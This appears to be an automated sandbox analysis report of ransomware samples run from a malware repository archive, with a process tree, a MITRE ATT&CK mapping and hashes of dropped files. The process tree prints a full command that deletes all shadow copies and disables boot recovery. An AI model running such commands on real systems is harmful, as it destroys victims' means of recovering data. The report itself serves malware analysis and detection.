                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\Error file remover.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\WinlockerVB6Blacksod.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ EXE_CMD_LINE="/exenoupdates /exelang 0 /noprereqs "
                                                                                          2⤵
                                                                                          • Enumerates connected drives
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:6908
                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                        1⤵
                                                                                        • Modifies WinLogon for persistence
                                                                                        • Enumerates connected drives
                                                                                        • Drops file in Program Files directory
                                                                                        • Drops file in Windows directory
                                                                                        • Modifies data under HKEY_USERS
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:5320
                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding C766D8B967DE38D28DA2C8C948A0283C
                                                                                          2⤵
                                                                                          • Loads dropped DLL
                                                                                          • Blocklisted process makes network request
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:6844
                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding D77E7BA0BFA3CC14294A227F79EAE266 E Global\MSI0000
                                                                                          2⤵
                                                                                          • Loads dropped DLL
                                                                                          • Drops file in Windows directory
                                                                                          PID:4892
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\Xyeta.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\Xyeta.exe"
                                                                                        1⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:5124
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5124 -s 472
                                                                                          2⤵
                                                                                          • Program crash
                                                                                          PID:7044
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5124 -ip 5124
                                                                                        1⤵
                                                                                          PID:6788
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\$uckyLocker.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\$uckyLocker.exe"
                                                                                          1⤵
                                                                                          • Sets desktop wallpaper using registry
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:6932
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                          1⤵
                                                                                          • Process spawned unexpected child process
                                                                                          PID:4452
                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                            vssadmin.exe delete shadows /all /quiet
                                                                                            2⤵
                                                                                            • Interacts with shadow copies
                                                                                            PID:3308
                                                                                          • C:\Windows\system32\bcdedit.exe
                                                                                            bcdedit.exe /set {default} recoveryenabled no
                                                                                            2⤵
                                                                                            • Modifies boot configuration data using bcdedit
                                                                                            PID:2336
                                                                                          • C:\Windows\system32\bcdedit.exe
                                                                                            bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                            2⤵
                                                                                            • Modifies boot configuration data using bcdedit
                                                                                            PID:3904
                                                                                        • C:\Windows\system32\vssvc.exe
                                                                                          C:\Windows\system32\vssvc.exe
                                                                                          1⤵
                                                                                            PID:5740
                                                                                          • C:\Windows\system32\OpenWith.exe
                                                                                            C:\Windows\system32\OpenWith.exe -Embedding
                                                                                            1⤵
                                                                                            • Modifies registry class
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:6120
                                                                                          • C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe
                                                                                            "C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe"
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • Modifies Internet Explorer settings
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:6444
                                                                                          • C:\Windows\system32\AUDIODG.EXE
                                                                                            C:\Windows\system32\AUDIODG.EXE 0x0000000000000500 0x000000000000048C
                                                                                            1⤵
                                                                                              PID:6548

                                                                                            Network

                                                                                            MITRE ATT&CK Enterprise v15

                                                                                            Reconnaissance

                                                                                            Resource Development

                                                                                            Initial Access

                                                                                            Execution

                                                                                            Windows Management Instrumentation

                                                                                            1
                                                                                            T1047

                                                                                            Persistence

                                                                                            Boot or Logon Autostart Execution

                                                                                            2
                                                                                            T1547

                                                                                            Registry Run Keys / Startup Folder

                                                                                            1
                                                                                            T1547.001

                                                                                            Winlogon Helper DLL

                                                                                            1
                                                                                            T1547.004

                                                                                            Privilege Escalation

                                                                                            Abuse Elevation Control Mechanism

                                                                                            1
                                                                                            T1548

                                                                                            Bypass User Account Control

                                                                                            1
                                                                                            T1548.002

                                                                                            Boot or Logon Autostart Execution

                                                                                            2
                                                                                            T1547

                                                                                            Registry Run Keys / Startup Folder

                                                                                            1
                                                                                            T1547.001

                                                                                            Winlogon Helper DLL

                                                                                            1
                                                                                            T1547.004

                                                                                            Defense Evasion

                                                                                            Abuse Elevation Control Mechanism

                                                                                            1
                                                                                            T1548

                                                                                            Bypass User Account Control

                                                                                            1
                                                                                            T1548.002

                                                                                            Direct Volume Access

                                                                                            1
                                                                                            T1006

                                                                                            File and Directory Permissions Modification

                                                                                            2
                                                                                            T1222

                                                                                            Windows File and Directory Permissions Modification

                                                                                            1
                                                                                            T1222.001

                                                                                            Hide Artifacts

                                                                                            2
                                                                                            T1564

                                                                                            Hidden Files and Directories

                                                                                            2
                                                                                            T1564.001

                                                                                            Impair Defenses

                                                                                            1
                                                                                            T1562

                                                                                            Disable or Modify Tools

                                                                                            1
                                                                                            T1562.001

                                                                                            Indicator Removal

                                                                                            2
                                                                                            T1070

                                                                                            File Deletion

                                                                                            2
                                                                                            T1070.004

                                                                                            Modify Registry

                                                                                            7
                                                                                            T1112

                                                                                            Credential Access

                                                                                            Credentials from Password Stores

                                                                                            1
                                                                                            T1555

                                                                                            Credentials from Web Browsers

                                                                                            1
                                                                                            T1555.003

                                                                                            Unsecured Credentials

                                                                                            1
                                                                                            T1552

                                                                                            Credentials In Files

                                                                                            1
                                                                                            T1552.001

                                                                                            Discovery

                                                                                            Browser Information Discovery

                                                                                            1
                                                                                            T1217

                                                                                            Peripheral Device Discovery

                                                                                            1
                                                                                            T1120

                                                                                            Query Registry

                                                                                            2
                                                                                            T1012

                                                                                            System Information Discovery

                                                                                            3
                                                                                            T1082

                                                                                            System Location Discovery

                                                                                            1
                                                                                            T1614

                                                                                            System Language Discovery

                                                                                            1
                                                                                            T1614.001

                                                                                            Lateral Movement

                                                                                            Collection

                                                                                            Data from Local System

                                                                                            1
                                                                                            T1005

                                                                                            Command and Control

                                                                                            Exfiltration

                                                                                            Impact

                                                                                            Defacement

                                                                                            1
                                                                                            T1491

                                                                                            Inhibit System Recovery

                                                                                            3
                                                                                            T1490

                                                                                            Replay Monitor

                                                                                            Loading Replay Monitor...

                                                                                            Downloads

                                                                                            • C:\Config.Msi\e5b222d.rbs
                                                                                              Filesize

                                                                                              100KB

                                                                                              MD5

                                                                                              8e7bc14dc2a25f320fd08041e3a1371b

                                                                                              SHA1

                                                                                              1854d82f39d1e4879cd08d4f8ab5dd6e37a505dd

                                                                                              SHA256

                                                                                              33d260036c2488e2ce2b90fdece3395458bd18c42b93e01c03899b37e24d45fa

                                                                                              SHA512

                                                                                              7e3adf460714fa133a232fe0354734f329668452c1e3071ce49e743a88548820675a36fa719b0c8fa61f1deb2b7504d7c48ce83450149eab432a5c153b34318c

                                                                                              Download Submit

                                                                                            • C:\ProgramData\KOcUocAg\fgMkMoUs.exe
                                                                                              Filesize

                                                                                              179KB

                                                                                              MD5

                                                                                              7ab1a67b2fccc7ca80740cb0160ac6d6

                                                                                              SHA1

                                                                                              898f5b3a2d9145a3e3c06a59c5ea7d9c7c89a706

                                                                                              SHA256

                                                                                              fbf58f600004392ed358b7a543d54a0e2f131523a00802aa444c20f1f76fb9b1

                                                                                              SHA512

                                                                                              a0e70123af65544518d9e0f28590b164f7ba4dfe28d73fe91d90231318e517a143a8aedb2c92c327f3f80127d23bc51343a2373f3f8bb104aa11da21aca29272

                                                                                              Download Submit

                                                                                            • C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.exe
                                                                                              Filesize

                                                                                              238KB

                                                                                              MD5

                                                                                              6752adb0443fa0a8e29c8c9ce62a5f85

                                                                                              SHA1

                                                                                              8a84dbc333beb7cc6dfaacf43b41accacb4c6e40

                                                                                              SHA256

                                                                                              269009850eab46eda04cecf5e96b20f8ed4dd5e59f95576a2b009d9b3687e752

                                                                                              SHA512

                                                                                              9062e36b1e671ade4984557ef6cacea5806fefa126a2390bf39eea4e9c6362cbda7c7079ebf4b797c061f06d07d57594be9244d610ebf98df23e3ab3bfa03979

                                                                                              Download Submit

                                                                                            • C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.exe
                                                                                              Filesize

                                                                                              323KB

                                                                                              MD5

                                                                                              003300e1006145ebb1993e8088ff9586

                                                                                              SHA1

                                                                                              63ee747b47b2e40535ccaa3ecf1408c224cab22d

                                                                                              SHA256

                                                                                              cd9dfd3abd543c5e7b2da08883b4dfa83ed8c12c34dde89f127a9797ab546301

                                                                                              SHA512

                                                                                              51f040dbff7c22a2269ff428ddd625dbdb0de49976a43abd616ac51351c8f928399b3ff6c2418899f0062252aaa71ff2ad9f97e3c5fb92509621c053f73fcf6e

                                                                                              Download Submit

                                                                                            • C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\VC_redist.x86.exe
                                                                                              Filesize

                                                                                              838KB

                                                                                              MD5

                                                                                              72949c8189966f673a4db965a97c1566

                                                                                              SHA1

                                                                                              e7420d47ecb16ae86616deba1ba2ae7294bc5baf

                                                                                              SHA256

                                                                                              5126532a82222ee46d00334be4dae2a8f07a4603dddebb36e6823b0d81232bc1

                                                                                              SHA512

                                                                                              bab38d40a922c35c961e4b2f54fe922de6a9d1c262619eddcdffecfcdf0be73791aff71ce38c32c60fb65c431a985048bb456abd732c34c72cfdfbdebf97dffe

                                                                                              Download Submit

                                                                                            • C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe
                                                                                              Filesize

                                                                                              818KB

                                                                                              MD5

                                                                                              64ffbeb18cf41185221946ce72e50b0f

                                                                                              SHA1

                                                                                              1ade0c8c1f83707a5196b2c78d823da1415045ab

                                                                                              SHA256

                                                                                              097c6acb8e4f95c6e48696b4a43c34d13bafe57ef69c8f2f6de61607bec13663

                                                                                              SHA512

                                                                                              eab2cf902cd10f1911993ecffc629096a5eb113d55ef44ba11641804b37147dd82ab7392f35027c890534352ec5b63262d909698ad34637b6092892298995b30

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                              Filesize

                                                                                              152B

                                                                                              MD5

                                                                                              554d6d27186fa7d6762d95dde7a17584

                                                                                              SHA1

                                                                                              93ea7b20b8fae384cf0be0d65e4295097112fdca

                                                                                              SHA256

                                                                                              2fa6145571e1f1ece9850a1ac94661213d3e0d82f1cef7ac1286ff6b2c2017cb

                                                                                              SHA512

                                                                                              57d9008ccabc315bd0e829b19fe91e24bab6ef20bcfab651b937b0f38eec840b58d0aed092a3bbedd2d6a95d5c150372a1e51087572de55672172adc1fc468a7

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                              Filesize

                                                                                              152B

                                                                                              MD5

                                                                                              a28bb0d36049e72d00393056dce10a26

                                                                                              SHA1

                                                                                              c753387b64cc15c0efc80084da393acdb4fc01d0

                                                                                              SHA256

                                                                                              684d797e28b7fd86af84bfb217d190e4f5e03d92092d988a6091b2c7bbbd67c1

                                                                                              SHA512

                                                                                              20940fee33aa2194c36a3db92d4fd314ce7eacc2aa745abec62aa031c2a53ba4ff89f2568626e7bd2536090175f8d045c3bb52c5faa5ecc8da8410ab5fc519f7

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
                                                                                              Filesize

                                                                                              3KB

                                                                                              MD5

                                                                                              99df65dc17cdd9875802c558de75a7b3

                                                                                              SHA1

                                                                                              b33be5b64245e248c193e5b9f770a1fde45b5037

                                                                                              SHA256

                                                                                              ac923742a04e70eddb0af8fe10d1b45c7fc567b371ff6eb08a7c783fa9165a57

                                                                                              SHA512

                                                                                              c0e0a4c3234afabf92ff85a59811a95c6a2ae2d878f70a73d314cf5f8410a670a4f3b47b5fb1946503c86155729f82ae75b3b3583cdea14e3808d256e3179b3a

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                                                              Filesize

                                                                                              1KB

                                                                                              MD5

                                                                                              2ff42633db25cb7a68248bc5605635ac

                                                                                              SHA1

                                                                                              1f124b799e9ee0b604e467a40679def8201acb41

                                                                                              SHA256

                                                                                              be4528af2fe5e8153d4c4de953dc0d01801baf038a8810dfde7ae90569031b6f

                                                                                              SHA512

                                                                                              7a7d1ece5564eb0f7b4ce57af95ee0690faf5f23d61af5ee6d5a8a66cf7f223c6af32c2339633e88731a22a4d1368e1ff7cf4c6d4778aaad5f2305ebbe1f7620

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                                                              Filesize

                                                                                              111B

                                                                                              MD5

                                                                                              285252a2f6327d41eab203dc2f402c67

                                                                                              SHA1

                                                                                              acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                                                                              SHA256

                                                                                              5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                                                                              SHA512

                                                                                              11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                              Filesize

                                                                                              5KB

                                                                                              MD5

                                                                                              17cedb4fe3ed55e9218070f58458e1ee

                                                                                              SHA1

                                                                                              be0a8da2aa40e80d0ea30e357375264651f8c17e

                                                                                              SHA256

                                                                                              2bc9eaf7d5ba81b1377f3fa627737ea11e7f08bb22d0b904e952d45fbf825219

                                                                                              SHA512

                                                                                              bb02c73a3a5ae416d719aa8220b9078e425f6d86fc94e699a0a0d871c4295c9148b64b8ffabd6dc3fd05cd32e4b536b5ce79563074e7d16bd5572ea8ff034e9b

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                              Filesize

                                                                                              6KB

                                                                                              MD5

                                                                                              d608f7ff4df99ab241f006d4e8403dff

                                                                                              SHA1

                                                                                              0acb87cb6cbc783c4add4f66d52f307729a046f3

                                                                                              SHA256

                                                                                              9903306bc07b3f208c88a8d2c91e75080c7cf11624aeb4edfe00188d4f3be2fb

                                                                                              SHA512

                                                                                              c1524d8fec3236a680a5e55f0b8a2dcb6eaf07b00afd43d6760131c0500ce21debd12089e19463fd999fcf94381e398483a198d0289e284f81f5186d3dffbeaa

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                              Filesize

                                                                                              6KB

                                                                                              MD5

                                                                                              4a6ddcf5518f73438c88c0ed747b34b2

                                                                                              SHA1

                                                                                              baba5efb3374074ec250b8842f831e02d14bf140

                                                                                              SHA256

                                                                                              9dc3299edfde9b01a652f1e1f267b818f9048b4179916838df90485f5ee10e7c

                                                                                              SHA512

                                                                                              cc07ed3833b80afc0b5b181046ad82dd7e4b6a773eb0cc49811a744a62a6f162d17c79c8c673d77e396e12e8913c64b7e892c0cf797c96f8b93716bab77b7011

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                              Filesize

                                                                                              6KB

                                                                                              MD5

                                                                                              56322b8161aa0a80c24d0cd57e8e87e0

                                                                                              SHA1

                                                                                              ee1373bcdab6797435b4a1f52378fd95c0800c29

                                                                                              SHA256

                                                                                              6c6dd857da55c89ae96bbb10a8cedbba5ee60cfa44283f7d1c087c7892f8b9b3

                                                                                              SHA512

                                                                                              2378e3dfe5c518ffa18ffa7d35af1b0d0df01c8c10575e9cb377bd798e4c6213f9ff1b5f96b1baffe6cd94ee9091aae80a2218773a2c738eabf7da529ffcfd18

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
                                                                                              Filesize

                                                                                              1KB

                                                                                              MD5

                                                                                              5fb865be4ba366e073e1aa6f3b9dad70

                                                                                              SHA1

                                                                                              82435ab7d5e7389791ba40bdee4b8011a848da2d

                                                                                              SHA256

                                                                                              0003dad800523f05baccf661ec72adaabc36119687c58c5f44e2f8e6a33d92eb

                                                                                              SHA512

                                                                                              f08ee7d2b616d1b2549ae486a15b03636385558a27130cdb5661b31170957686744520f282a71ce7833141b3e62e88808a089e082d52469531c375d37c19a5fa

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
                                                                                              Filesize

                                                                                              1KB

                                                                                              MD5

                                                                                              c7d0721e6560948d6a9ceb661e9ef0b8

                                                                                              SHA1

                                                                                              574ac23f253a4a990c9a379623ef71dafc2cec6d

                                                                                              SHA256

                                                                                              18107b8bd3b3b404a57bc182c24e3ee6dd2a246af08ef3629039672488d9dab0

                                                                                              SHA512

                                                                                              c91f4f9e4f23526d04ac99749d9f36653bb5aaaa451dc2ec9218ad34361c725434a8b79ebb5de8491628eba8369f9d52b7cddcda05f3cba11deab878b3d22709

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
                                                                                              Filesize

                                                                                              1KB

                                                                                              MD5

                                                                                              5cf321e61c5dce515311ce6b17a8c188

                                                                                              SHA1

                                                                                              3959856a6bd3bf03a360641a6bb87d457fdb8577

                                                                                              SHA256

                                                                                              2aba5ee9431a2df46fddb1fdad1b2b4a7235ae5c058afb66ea8784b14c8e578d

                                                                                              SHA512

                                                                                              24d86bde410aa885e2c98c7aa07425d5f9350c4c275e2986280f0451075fcc73166533a46087177970ff8be1d245af71d18d09da174a4d913baf536485a11ae3

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5820c2.TMP
                                                                                              Filesize

                                                                                              203B

                                                                                              MD5

                                                                                              73cebd290f620d4b0eb1082673438bdb

                                                                                              SHA1

                                                                                              8f7a0f16f7d7268a0778a27114d596d29da74f1f

                                                                                              SHA256

                                                                                              9afd86c946d08bd908873241f3675d90162b374e41e8781abd836df6c7e0c1a0

                                                                                              SHA512

                                                                                              1b359c3305bc446a4c9c114c94e1d1a11a51565e28e29d0f577ad1b713351f2550d0c402fd8bde811158fa3640720047d96bb1d95ca1bb2e5aa4fceecc13bee2

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                                                              Filesize

                                                                                              16B

                                                                                              MD5

                                                                                              6752a1d65b201c13b62ea44016eb221f

                                                                                              SHA1

                                                                                              58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                              SHA256

                                                                                              0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                              SHA512

                                                                                              9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                              Filesize

                                                                                              11KB

                                                                                              MD5

                                                                                              9156b3a3a853ec71ddf6c8873d8d73eb

                                                                                              SHA1

                                                                                              dd7763fed6ed5b78041b630530010e7b91c591c2

                                                                                              SHA256

                                                                                              5a601a8f3342aadd43b932e634b739b35b1009392f2a514e6eb73c7f49455fb2

                                                                                              SHA512

                                                                                              f5d2462f7aeed29057d96a79da0f309075d15075f4b2dea085b8912ebb71e326592a664b2f91624cb227939afac1290d922dffb4bb4c8354db9bf1b5ffb68fa1

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                              Filesize

                                                                                              10KB

                                                                                              MD5

                                                                                              555ac4087887ca1d018f04fba2574609

                                                                                              SHA1

                                                                                              16a2a849a2e31e4015b170435eafebe3801d8138

                                                                                              SHA256

                                                                                              2fab0c598337a71244c03f589c1989325ab52d58fb90f4e6b8f8099c6eda4a4e

                                                                                              SHA512

                                                                                              ccba7b8d63db79a4bbdc424bec8ce33dfa3758222d56a1cd3ab952ae2d387e87d3332815cc41db31111bd51e2630fd6ae1b41e08f6f2f17939fd8444959b94de

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                              Filesize

                                                                                              10KB

                                                                                              MD5

                                                                                              0dca492dcd5ce8020ae432c1e20fbaa5

                                                                                              SHA1

                                                                                              07a0cdfa8517ad2e25cfc84cbf7a9aa15c0a73b8

                                                                                              SHA256

                                                                                              6099def2ef052d01083a90ea517a0bfae17faa823af3f4adfb2c6af9c251211c

                                                                                              SHA512

                                                                                              f61e7f686852e52208358b8187588809c611bb4c187480bba3ab22a238a914617792c463f7887988c06a6c325c260d3e67d50cb91648972f1cb9a3b8ff935d08

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                              Filesize

                                                                                              11KB

                                                                                              MD5

                                                                                              992b081e3b19dc6398ddaa2e3941b0ac

                                                                                              SHA1

                                                                                              dad9639751086f51d7d5fdf1eb5bf613478d29f4

                                                                                              SHA256

                                                                                              8f51df9f071e4826aaaf2912b7029cd4a6797348d7237198275aaa11ce357425

                                                                                              SHA512

                                                                                              4138ec0fdb361f83f74afb8180ea5133437d3b9413cb48dd88c0993e90b95bbebd498a005a97059b96f02169ae24af4f5d55b59946e81ef7400e39bc61a8711e

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Temp\AdvinstAnalytics\Error file remover\1.0.0.0\tracking.ini
                                                                                              Filesize

                                                                                              84B

                                                                                              MD5

                                                                                              d4ac6cf0c69bc7a1bd9f3102e4663a9c

                                                                                              SHA1

                                                                                              424bdfb2c137663f33c4ba306bfb4f69a99e2f63

                                                                                              SHA256

                                                                                              ab485b2bec42445a066d306010803ed4bad51151ac3da931b4f4043e29eae6bc

                                                                                              SHA512

                                                                                              2b16031e5d43f18de601feba1eccf51aaf11dc1830a154ddd10552a9f32bf8202ca06fd5373a6045f94556c27403131c3357ab2dc1c063dda3458538ec7f16fc

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Temp\AdvinstAnalytics\Error file remover\1.0.0.0\tracking.ini
                                                                                              Filesize

                                                                                              84B

                                                                                              MD5

                                                                                              df7a122d9b2f36e8e0554587909b9fff

                                                                                              SHA1

                                                                                              d51630656ed6249a782d3676f447737ab9f7e2ab

                                                                                              SHA256

                                                                                              ef142b09342c90ac9438aa97dd7685bef8b9f687c042b5e3eb987506e86d71a0

                                                                                              SHA512

                                                                                              9a246b14f2e02b8e64e58d9bb39eb10ea6389e664b2d91a1a35cecb512ad1247d77e275bd0c105f41ac622885bb89733553dad4579e6a42c07dcb5b2b9810948

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Temp\AdvinstAnalytics\Error file remover\1.0.0.0\{F85582CD-32BD-4EF5-9628-06446481E4FD}.session
                                                                                              Filesize

                                                                                              4KB

                                                                                              MD5

                                                                                              6386e01ee397940499e5a80f7f398ed6

                                                                                              SHA1

                                                                                              de09f79a3db0cf7a5c02a1189ea70c4feb3725fc

                                                                                              SHA256

                                                                                              cbd0190283e30d251dd1a02f252d1329fe94b9e6e5a64ec9d65e2e0d557c0ab6

                                                                                              SHA512

                                                                                              9f7876d323a9e65ead7ffa8fb56e389967a38eae9f833272cf008c2bb90b388635c7823ac3798daa3ad651dea844e00c2f87e7d179c3576858c12c0af1215fb5

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Temp\AdvinstAnalytics\Error file remover\1.0.0.0\{F85582CD-32BD-4EF5-9628-06446481E4FD}.session
                                                                                              Filesize

                                                                                              4KB

                                                                                              MD5

                                                                                              91ae062b409a63478803b76416e06708

                                                                                              SHA1

                                                                                              7e05be4a2725e3eecee9a50baf4ccb08fff27c94

                                                                                              SHA256

                                                                                              5d4290ad595249fd3c36d5948060b9e09e152d654ac6d6bbbe758327c0f6449f

                                                                                              SHA512

                                                                                              ca5e0edef06c29045fe21c76400b02d3c3f89c20939e509ef4f3db10872901b9ce1cec80e3a0eded5e456f8b31ec74962dfed94d708746c5209c0d8c396f1873

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\!WannaDecryptor!.exe.lnk
                                                                                              Filesize

                                                                                              1KB

                                                                                              MD5

                                                                                              6f62c03dd85f4a495b8be9b43b78c5b3

                                                                                              SHA1

                                                                                              d5faa9d35868fe83ebf4fe559511ab5cd07e0f5b

                                                                                              SHA256

                                                                                              4f0dc738d75b3fe8915891245d4d2f59d1f58fd4d3e7dfb5c9c8d3ede82abfd2

                                                                                              SHA512

                                                                                              a5f97a3aef77a449b8459608732ab3bf429114096bf02d1461926d78c1c9ccc08e6945a3b6e7e7437fcbc4da46ee28f1294d7c3de7bb6cc4922d6a52e23e0519

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\00000000.eky
                                                                                              Filesize

                                                                                              1KB

                                                                                              MD5

                                                                                              30b193ab44967f401d78a68077a4cd2b

                                                                                              SHA1

                                                                                              8fb3036e66dbc62578ed5f9e4a96ce577ea4b55d

                                                                                              SHA256

                                                                                              bb7efe0f0d1dd4881f23ae1404369980556fe077304c1975b5d92dab2004db08

                                                                                              SHA512

                                                                                              f2abdd92cb12cc8232ab906cfcc6d14422ff9e17fd09645acd96834ae70410974b0641483efaa1403509673cce8822b20e2b8b24684309354bf5fb552a648a2d

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\00000000.pky
                                                                                              Filesize

                                                                                              276B

                                                                                              MD5

                                                                                              7683545a3a4e2aafb995f0ab81eaed88

                                                                                              SHA1

                                                                                              e5136c3f9a0364052aac6fc2b32f183271202f9d

                                                                                              SHA256

                                                                                              b52b9f33550069805e8bd6c5f0ff63fb5460c6186e579561a31bc7bde7d836f5

                                                                                              SHA512

                                                                                              c8aa35229641920f0631c6d069a66247682873f57d0b97096a5ab9144aa781592ffc81f487e43ceae0cc3cfca349bce29d94901706e7fc0ab3f5156b7180a56c

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\00000000.res
                                                                                              Filesize

                                                                                              136B

                                                                                              MD5

                                                                                              c957a34f19801e0591ca27a51f554970

                                                                                              SHA1

                                                                                              5015dcba831d0bda64a3ae6d0349cddeaaf7c468

                                                                                              SHA256

                                                                                              e92260f3cd7dbe60d7babcc243f4422aa26e0c1d7599793600f93ea9060b6ae6

                                                                                              SHA512

                                                                                              bffdd63bcddf198af28e992e9b9d6189b16ee06981e958cb992390deaab988dbdd5856edee51c3ff52e7beeee25e5a6470fa0ef6f34514a04f9fdf8d25b79821

                                                                                              Download Submit

                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\36341738422429.bat
                                                                                              Filesize

                                                                                              474B

                                                                                              MD5

                                                                                              8c747809f440565ae31ff56fc6ee3726

                                                                                              SHA1

                                                                                              ef010d0ba47bd09652b4910e72ddac78e3c76cf4

                                                                                              SHA256

                                                                                              38de07ecb4fd6c81a4b4d0d5e9a30feac3bba198eccdee8271fef4ae005dc9d1

                                                                                              SHA512

                                                                                              cc3637528185ddc8a3e6b79aeb3945ca67282d9588a552606547bbef88a77e8195e50a29aa676041fb2263651fde4986f74011acbc3eb49923d7f250b01759ca

                                                                                              Download Submit

